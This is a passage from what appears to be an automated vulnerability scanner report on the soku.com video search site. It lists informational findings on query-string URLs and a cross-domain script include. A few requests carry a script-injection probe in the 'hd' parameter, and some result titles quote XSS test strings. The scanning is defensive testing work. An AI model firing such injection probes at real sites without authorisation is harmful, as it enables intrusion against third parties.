href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5"  >    Konakart 2.2.6.0 stored <span class="highlight">...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6">   </a></li><img alt="......028" src="http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26" >    </li>...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6"  >   ......028</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990'>   </a>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7">     </a></li><img alt="<script>alert(xss)<script>" src="http://g3.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE" >     </li>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7"  >     <script>...[SNIP]... <script type="text/javascript" src="http://lstat.youku.com/urchin.js">  </script>...[SNIP]...   
3.3. http://www.soku.com/v 
 previous 
 next 
Summary 
Severity:   
Information  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The page was loaded from a URL containing a query string:http://www.soku.com/v?keyword=xss&hd=%22%3E%3CSCRIPT%3Edocument.title=1313775822796041%3C/SCRIPT%3E%3C%22     http://g1.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE    http://g1.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E    http://g1.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5    http://g1.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A    http://g2.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF    http://g2.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6    http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26    http://lstat.youku.com/urchin.js  http://v.blog.sohu.com/u/vw/1740891  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html  http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html  http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html  http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html  http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html  http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99   http://www.youku.com/ http://www.youku.com/youku/help/question_play.shtml    
Request 
GET /v?keyword=xss&hd=%22%3E%3CSCRIPT%3Edocument.title=1313775822796041%3C/SCRIPT%3E%3C%22 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7       
Response 
HTTP/1.0 200 OK/title>...[SNIP]... <a href="http://www.youku.com" target="_blank">  <span class="logoyouku_sl">...[SNIP]... <a href="http://www.youku.com/youku/help/question_play.shtml#java" target="_blank">   ...............</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68'>   </a>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1">     </a></li><img alt="...............458" src="http://g1.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A" >    </li>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1"  >     ...............458</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219'>   </a>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2">    </a></li><img alt="xss......  ........." src="http://g2.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF" >    </li>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115'>   </a>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3">    </a></li><img alt="XSS Shell Demo" src="http://g1.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E" >    </li>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82'>   </a>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4">    </a></li><img alt="4.6XSS ......3.........." src="http://g1.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5" >    </li>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4"  >    4.6<span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149'>   </a>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5">    </a></li><img alt="Konakart 2.2.6.0 stored XSS explitation with BeEF" src="http://g2.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6" >    </li>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5"  >    Konakart 2.2.6.0 stored <span class="highlight">...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6">   </a></li><img alt="......028" src="http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26" >    </li>...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6"  >   ......028</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990'>   </a>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7">     </a></li><img alt="<script>alert(xss)<script>" src="http://g1.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE" >     </li>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7"  >     <script>...[SNIP]... <script type="text/javascript" src="http://lstat.youku.com/urchin.js">  </script>...[SNIP]...   
3.4. http://www.soku.com/v 
 previous 
 next 
Summary 
Severity:   
Information  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The page was loaded from a URL containing a query string:http://www.soku.com/v?keyword=xss  http://g1.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E    http://g1.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A    http://g2.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF    http://g2.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5    http://g2.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6    http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26    http://g3.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE    http://lstat.youku.com/urchin.js  http://v.blog.sohu.com/u/vw/1740891  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html  http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825   http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html  http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36   http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html  http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76   http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html  http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69   http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html  http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57   http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html  http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74   http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99   http://www.youku.com/ http://www.youku.com/youku/help/question_play.shtml    
Request 
GET /v?keyword=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3    
Response 
HTTP/1.0 200 OK/title>...[SNIP]... <a href="http://www.youku.com" target="_blank">  <span class="logoyouku_sl">...[SNIP]... <a href="http://www.youku.com/youku/help/question_play.shtml#java" target="_blank">   ...............</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=11'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=22'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=34'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=45'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html?firsttime=68'>   </a>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1">     </a></li><img alt="...............458" src="http://g1.ykimg.com/0100641F464DB7A2549E4E052E24FA859D7041-B8E3-4A3B-A224-41872BC9728A" >    </li>...[SNIP]... <a title="...............458" target="_blank" href="http://v.youku.com/v_show/id_XMjYyMjE2NjE2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="1"  >     ...............458</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=36'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=73'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=109'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=146'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=182'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html?firsttime=219'>   </a>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2">    </a></li><img alt="xss......  ........." src="http://g2.ykimg.com/0100011F464767580FEA100055D974EDB4E283-2614-AF59-0A0F-F8CF3BB2CEAF" >    </li>...[SNIP]... <a title="xss......  ........." target="_blank" href="http://v.youku.com/v_show/id_XMjAxMzE2MDA=.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="2"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=19'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=38'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=57'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=76'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=96'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html?firsttime=115'>   </a>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3">    </a></li><img alt="XSS Shell Demo" src="http://g1.ykimg.com/0100641F464D21A3D1C47304DE8530BC4B887C-8F64-3ACF-49D0-4A72FD69020E" >    </li>...[SNIP]... <a title="XSS Shell Demo" target="_blank" href="http://v.youku.com/v_show/id_XMjM0MzY1NDA4.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="3"  >    <span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=13'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=27'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=41'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=55'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=69'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html?firsttime=82'>   </a>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4">    </a></li><img alt="4.6XSS ......3.........." src="http://g2.ykimg.com/0100641F464D612B0ED8B604E4E2F9D52B19C1-F011-44DF-6762-BB54C7082CB5" >    </li>...[SNIP]... <a title="4.6XSS ......3.........." target="_blank" href="http://v.youku.com/v_show/id_XMjQ1MzM0ODQ0.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="4"  >    4.6<span class="highlight">...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=24'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=49'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=74'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=99'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=124'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html?firsttime=149'>   </a>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5">    </a></li><img alt="Konakart 2.2.6.0 stored XSS explitation with BeEF" src="http://g2.ykimg.com/0100641F464E07AF1EEF1F054E844A654A42C3-79BC-5660-7D40-49AFECAB39C6" >    </li>...[SNIP]... <a title="Konakart 2.2.6.0 stored XSS explitation with BeEF" target="_blank" href="http://v.youku.com/v_show/id_XMjc5Nzg5ODc2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="5"  >    Konakart 2.2.6.0 stored <span class="highlight">...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6">   </a></li><img alt="......028" src="http://g2.ykimg.com/0900641F4649C55F2300000000000000000000-0000-0000-0000-000017CA8E26" >    </li>...[SNIP]... <a title="......028" target="_blank" href="http://v.blog.sohu.com/u/vw/1740891"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="6"  >   ......028</a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=165'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=330'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=495'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=660'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=825'>   </a>...[SNIP]... <a target='_blank' href='http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html?firsttime=990'>   </a>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html" onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7">     </a></li><img alt="<script>alert(xss)<script>" src="http://g3.ykimg.com/0100011F4648886DB69E0D00DB5F226061289C-AFCD-A21C-E901-AD280BC25DAE" >     </li>...[SNIP]... <a title="<script>alert(xss)<script>" target="_blank" href="http://v.youku.com/v_show/id_XMTI4NTg1MjU2.html"  onclick="sokuClickStat(this, true);"  _log_type="3" _log_pos="7"  >     <script>...[SNIP]... <script type="text/javascript" src="http://lstat.youku.com/urchin.js">  </script>...[SNIP]...   
4. Cross-domain script include 
 previous 
 next 
There are 2 instances of this issue: 
Issue background 
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. 
Issue remediation 
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code. 
4.1. http://www.soku.com/ 
 previous 
 next 
Summary 
Severity:   
Information  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/  
Issue detail 
The response dynamically includes the following script from another domain:http://lstat.youku.com/urchin.js   
Request 
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3    
Response 
HTTP/1.1 200 OK.</title>...[SNIP]... <script type="text/javascript" src="http://lstat.youku.com/urchin.js">  </script>...[SNIP]...   
4.2. http://www.soku.com/v 
 previous 
Summary 
Severity:   
Information  
Confidence:   
Certain  
Host:   
http://www.soku.com  
Path:   
/v  
Issue detail 
The response dynamically includes the following script from another domain:http://lstat.youku.com/urchin.js   
Request 
GET /v?keyword=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3    
Response 
